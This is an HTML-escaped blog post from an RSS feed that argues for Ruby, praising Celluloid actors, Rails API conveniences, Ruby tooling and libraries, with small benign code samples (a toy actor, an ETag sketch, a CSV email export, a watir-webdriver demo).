&lt;p&gt;The best concurrency model I know of in the Ruby world is the one provided by the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;celluloid&#x2F;celluloid&quot;&gt;Celluloid&lt;&#x2F;a&gt; family. Celluloid, with the help of its children &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;celluloid&#x2F;dcell&quot;&gt;DCell&lt;&#x2F;a&gt; — this is the best one — and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;celluloid&#x2F;celluloid-io&quot;&gt;Celluloid::IO&lt;&#x2F;a&gt;, tries to help you achieve the nirvana described by these two famous quotes:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;“I thought of objects being like biological cells and&#x2F;or individual computers on a network, only able to communicate with messages” — &lt;strong&gt;Alan Kay, creator of Smalltalk, on the meaning of “object oriented programming”&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;hr &#x2F;&gt;
&lt;blockquote&gt;
&lt;p&gt;“Objects can message objects transparently that live on other machines over the network, and you don’t have to worry about the networking gunk, and you don’t have to worry about finding them, and you don’t have to worry about anything. It’s just as if you messaged an object that’s right next door.” -&lt;strong&gt;Steve Jobs describing the NeXT Portable Distributed Object system&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
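&lt;p&gt;The actor idea behind Celluloid — an object that owns its own thread and is spoken to only through messages — can be sketched with nothing but the standard library. This is of course a toy; Celluloid adds supervision, futures, linking and much more on top of it:&lt;&#x2F;p&gt;

```ruby
# A toy actor: it owns a mailbox (a thread-safe Queue) and a private thread,
# and the outside world interacts with it only by sending messages.
class TinyActor
  def initialize
    @mailbox = Queue.new
    @thread = Thread.new do
      while (message = @mailbox.pop)
        reply_queue, payload = message
        reply_queue.push(payload.upcase) # the actor's "behavior"
      end
    end
  end

  # Send a message and block until the actor replies.
  def ask(payload)
    reply_queue = Queue.new
    @mailbox.push([reply_queue, payload])
    reply_queue.pop
  end
end

actor = TinyActor.new
puts actor.ask("hello, actors") # prints HELLO, ACTORS
```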
&lt;hr &#x2F;&gt;
&lt;h4 id=&quot;why-i-like-ruby&quot;&gt;&lt;strong&gt;Why I like Ruby&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-U24Mc9wNeiSNp2_eOYIGWg.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Time to land on Earth. We have spent too much time floating in the sky, and I have never explained why I use and like Ruby.&lt;&#x2F;p&gt;
&lt;p&gt;In comparison with other dynamically typed languages it has an awesome set of tools, such as &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;bbatsov&#x2F;rubocop&quot;&gt;rubocop&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;YorickPeterse&#x2F;ruby-lint&quot;&gt;ruby-lint&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;troessner&#x2F;reek&quot;&gt;reek&lt;&#x2F;a&gt;, that help you analyze your code. Furthermore, it has the best &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Read%E2%80%93eval%E2%80%93print_loop&quot;&gt;REPL&lt;&#x2F;a&gt; I am aware of: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;pryrepl.org&#x2F;&quot;&gt;pry&lt;&#x2F;a&gt;. Watch &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;youtu.be&#x2F;D9j_Mf91M0I&quot;&gt;REPL driven development with Pry&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;youtu.be&#x2F;jDXsEzOHb2M&quot;&gt;Pry, The Good Parts!&lt;&#x2F;a&gt; to learn how it can help you speed up your development.&lt;&#x2F;p&gt;
&lt;p&gt;On the other hand, as I mentioned before, it’s not as fast as C or Java, but Ruby core developers are doing excellent work in that area. For example, check the history of improvements to the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;tmm1.net&#x2F;ruby21-rgengc&#x2F;&quot;&gt;Ruby garbage collector&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;Even though I sometimes find its Perl-inherited attitude of having more than &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.senktec.com&#x2F;2013&#x2F;09&#x2F;one-way-to-do-it&#x2F;&quot;&gt;one way to do the same thing&lt;&#x2F;a&gt; overwhelming (for some reason I need to reread &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.robertsosinski.com&#x2F;2008&#x2F;12&#x2F;21&#x2F;understanding-ruby-blocks-procs-and-lambdas&#x2F;&quot;&gt;Understanding Ruby Blocks, Procs and Lambdas&lt;&#x2F;a&gt; every month or so), in general I really like its syntax and semantics. I think it’s a very expressive and intuitive language. In my opinion, though, how good a language is is not defined only by semantics, syntax and performance. I am not an academic. I have not even finished university.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;zedshaw.com&#x2F;essays&#x2F;master_and_expert.html&quot;&gt;The Master, The Expert, The Programmer&lt;&#x2F;a&gt;:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;Programming is a very new discipline, so there’s not too many master programmers out there. What’s worse is that the few people I would consider masters aren’t very exemplary of the software profession and art. They are typically professors who never write anything under a deadline and are given complete artistic freedom to develop whatever they want.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;I am not saying this in any mean way. I have huge respect for professors and researchers. But I am not one. I code stuff on a deadline. That’s why the community and the tools it has created are really important to me. They are the salt and pepper of what I am cooking. This is why I love Ruby: it has a lot of salt and pepper. I particularly like Rails, the best-known Ruby framework, and its cut-down version &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;rails-api&#x2F;rails-api&quot;&gt;Rails API&lt;&#x2F;a&gt;, because of the following features:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.unlimitednovelty.com&#x2F;2012&#x2F;08&#x2F;debunking-nodejs-gish-gallop.html&quot;&gt;Debunking the Node.js Gish Gallop&lt;&#x2F;a&gt;:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Handled at the middleware layer:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Reloading: Rails applications support transparent reloading. This works even if your application gets big and restarting the server for every request becomes non-viable.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Development Mode: Rails application come with smart defaults for development, making development pleasant without compromising production-time performance.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Test Mode: Ditto test mode.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Logging: Rails applications log every request, with a level of verbosity appropriate for the current mode. Rails logs in development include information about the request environment, database queries, and basic performance information.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Security: Rails detects and thwarts IP spoofing attacks and handles cryptographic signatures in a timing attack aware way. Don’t know what an IP spoofing attack or a timing attack is? Exactly.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Parameter Parsing: Want to specify your parameters as JSON instead of as a URL-encoded String? No problem. Rails will decode the JSON for you and make it available in params. Want to use nested URL-encoded params? That works too.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Conditional GETs: Rails handles conditional GET, (ETag and Last-Modified), processing request headers and returning the correct response headers and status code. All you need to do is use the stale? check in your controller, and Rails will handle all of the HTTP details for you.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Caching: If you use dirty? with public cache control, Rails will automatically cache your responses. You can easily configure the cache store. HEAD requests: Rails will transparently convert HEAD requests into GET requests, and return just the headers on the way out. This makes HEAD work reliably in all Rails APIs.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Handled at the ActionPack layer:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Resourceful Routing: If you’re building a RESTful JSON API, you want to be using the Rails router. Clean and conventional mapping from HTTP to controllers means not having to spend time thinking about how to model your API in terms of HTTP.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;URL Generation: The flip side of routing is URL generation. A good API based on HTTP includes URLs (see the GitHub gist API for an example).&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Header and Redirection Responses: head :no_content and redirect_to user_url(current_user) come in handy. Sure, you could manually add the response headers, but why?&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Caching: Rails provides page, action and fragment caching. Fragment caching is especially helpful when building up a nested JSON object. Basic, Digest and Token Authentication: Rails comes with out-of-the-box support for three kinds of HTTP authentication.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Instrumentation: Rails 3.0 added an instrumentation API that will trigger registered handlers for a variety of events, such as action processing, sending a file or data, redirection, and database queries. The payload of each event comes with relevant information (for the action processing event, the payload includes the controller, action, params, request format, request method and the request’s full path).&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Generators: This may be passé for advanced Rails users, but it can be nice to generate a resource and get your model, controller, test stubs, and routes created for you in a single command.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Plugins: Many third-party libraries come with support for Rails that reduces or eliminates the cost of setting up and gluing together the library and the web framework. This includes things like overriding default generators, adding rake tasks, and honoring Rails choices (like the logger and cache backend).&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
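&lt;p&gt;Take the conditional GET feature from that list as an example of how much HTTP bookkeeping Rails hides. The core idea can be sketched with just the standard library — Rails’ stale? helper automates exactly this dance for you:&lt;&#x2F;p&gt;

```ruby
require 'digest'

# Sketch of the conditional-GET dance that Rails automates: derive an ETag
# from the response body and answer 304 Not Modified when the client sends
# that same tag back in the If-None-Match header.
def respond(body, if_none_match)
  etag = '"' + Digest::SHA1.hexdigest(body) + '"'
  if if_none_match == etag
    [304, etag, nil] # Not Modified: the body is not resent
  else
    [200, etag, body]
  end
end

status, etag, _body = respond("user list", nil)
puts status # prints 200

status, _etag, _body = respond("user list", etag) # client replays the ETag
puts status # prints 304
```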
&lt;p&gt;These features are priceless when a deadline is hanging over your head like a guillotine. I think they are partly the reason &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;blog.targeterapp.com&#x2F;post&#x2F;22984987832&#x2F;why-we-moved-from-nodejs-to-ror&quot;&gt;why Targeter moved from NodeJS to RoR&lt;&#x2F;a&gt;. This doesn’t mean I don’t like Nodejs, but that discussion is beyond the scope of this post.&lt;&#x2F;p&gt;
&lt;p&gt;For example, this week, a client asked me to create a button on the admin site so that they could get the emails from the users of the application. It took me less than ten minutes to do it:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;invitations_emails = InvitationRequest.pluck(:email)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;user_emails = User.pluck(:email)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;content = (invitations_emails + user_emails).to_csv&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;send_data content, filename: &amp;quot;emails.csv&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;However, all this magic isn’t always great, in particular when you have performance issues or library-related bugs. But in most cases it will save you from reinventing the wheel.&lt;&#x2F;p&gt;
&lt;p&gt;Along the same lines, devise (authentication), paperclip (a file attachment library that helps you treat files like any other attribute), kaminari (a paginator), geocoder (a really simple and complete geocoding solution), koala (a Facebook library supporting the Graph and REST APIs), aws-sdk (self-explanatory), tire (an API and DSL for the Elasticsearch search engine) and the other alternatives you can find in &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.ruby-toolbox.com&#x2F;&quot;&gt;The Ruby Toolbox&lt;&#x2F;a&gt; will make you cry with joy when your non-technical boss asks you to add new functionality in a couple of hours.&lt;&#x2F;p&gt;
&lt;p&gt;Also, cucumber and rspec will be of great help in checking that the commit you made on Monday morning, while still really sleepy, won’t destroy everything. I also want to mention RVM — the greatest version manager of any language I know — and RubyGems, which, after Node.js’s great npm package manager, is the best one I know.&lt;&#x2F;p&gt;
&lt;p&gt;Lastly, I want to show you &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;watirwebdriver.com&#x2F;&quot;&gt;watir-webdriver&lt;&#x2F;a&gt;. I bet you can’t find a better API to drive a browser. This is a perfect example of how rich and simple Ruby libraries are:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;require &amp;#39;watir-webdriver&amp;#39;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;b = Watir::Browser.new&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;b.goto &amp;#39;bit.ly&#x2F;watir-webdriver-demo&amp;#39;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;b.text_field(:id =&amp;gt; &amp;#39;entry_0&amp;#39;).set &amp;#39;your name&amp;#39;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;b.select_list(:id =&amp;gt; &amp;#39;entry_1&amp;#39;).select &amp;#39;Ruby&amp;#39;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;b.select_list(:id =&amp;gt; &amp;#39;entry_1&amp;#39;).selected? &amp;#39;Ruby&amp;#39;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;b.button(:name =&amp;gt; &amp;#39;submit&amp;#39;).click&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;b.text.include? &amp;#39;Thank you&amp;#39;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;I haven’t mentioned yet that Ruby is also an excellent language for creating prototypes or for doing IT-related work like dealing with files and parsing strings.&lt;&#x2F;p&gt;
&lt;p&gt;Finally, if you need to create a webpage or a REST API with limited time and money, especially when you don’t need real-time features, I can’t currently imagine a better choice than Ruby and Rails.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;h4 id=&quot;closing-words&quot;&gt;&lt;strong&gt;Closing words&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;I won’t deny that Ruby has lost some momentum. But that doesn’t mean the language is dead. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.codinghorror.com&#x2F;blog&#x2F;2013&#x2F;03&#x2F;why-ruby.html&quot;&gt;I think it has matured&lt;&#x2F;a&gt; and that it is a great tool to add to your arsenal as a developer.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.reddit.com&#x2F;r&#x2F;programming&#x2F;comments&#x2F;1oi8wd&#x2F;ruby_is_a_dying_language&#x2F;?utm_source=rubyweekly&amp;amp;utm_medium=email&quot;&gt;frycicle&lt;&#x2F;a&gt; explained it really well in a few words.&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;Shoot, in terms of libraries, language design, and community, Ruby has it all. It’s won’t scale to 10 website levels. And that is ok for it’s use. They usually have to make super specialized software anyways.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;Even accepting that Ruby is not dying, we could ask ourselves &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;youtu.be&#x2F;dE4toi7y1MM&quot;&gt;why hasn’t Ruby won?&lt;&#x2F;a&gt; The answer is that:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Sarah Mei:&lt;&#x2F;strong&gt; this is a game where there is no winning, it turns out, but there is losing, there is definitely losing. […] The best thing that you can do for Ruby is go learn something else and then come back.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;bascule&quot;&gt;@bascule&lt;&#x2F;a&gt; daily amazed at the number of ruby people I come across in the scala and Go worlds too. Ruby opens your mind.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;— Paul Lamb (@PaulLamb) &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;PaulLamb&#x2F;statuses&#x2F;426338111094661120&quot;&gt;January 23, 2014&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;That’s why you should learn some Python, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;blog.grok.se&#x2F;2013&#x2F;10&#x2F;on-comparing-languages-c-and-go&#x2F;&quot;&gt;Go&lt;&#x2F;a&gt;, Rust, Erlang, Scala, Haskell, Clojure or any Lisp dialect. Oh, and keep an eye on &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;julialang.org&#x2F;&quot;&gt;Julia&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;elixir-lang.org&#x2F;&quot;&gt;Elixir&lt;&#x2F;a&gt;!&lt;&#x2F;p&gt;
</description>
      </item>
    </channel>
</rss>
